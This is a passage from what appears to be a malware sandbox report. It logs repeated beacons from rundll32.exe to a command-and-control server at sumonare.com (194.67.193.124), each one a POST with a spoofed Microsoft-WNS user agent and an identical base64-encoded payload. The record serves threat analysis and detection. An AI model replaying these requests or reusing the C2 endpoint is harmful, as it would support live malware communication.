                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:50.165543079 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:49 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                84192.168.2.749807194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:50.332117081 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:51.162687063 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:50 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                85192.168.2.749808194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:51.315865040 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:52.124708891 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:51 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                86192.168.2.749809194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:52.269217014 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:53.262797117 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:52 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                87192.168.2.749810194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:53.408438921 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:54.230036020 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:53 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                88192.168.2.749811194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:54.385066032 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:55.203732967 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:54 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                89192.168.2.749812194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:55.349313974 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:56.158932924 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:55 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                90192.168.2.749813194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:56.318146944 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:57.119205952 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:56 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                91192.168.2.749814194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:57.286072016 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:58.108185053 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:57 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                92192.168.2.749815194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:58.282793999 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:59.102058887 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:58 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                93192.168.2.749816194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:59.251980066 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:24:00.044238091 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:59 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                94192.168.2.749817194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:24:00.194814920 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:24:00.995470047 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:24:00 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                95192.168.2.749818194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:24:01.165055037 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
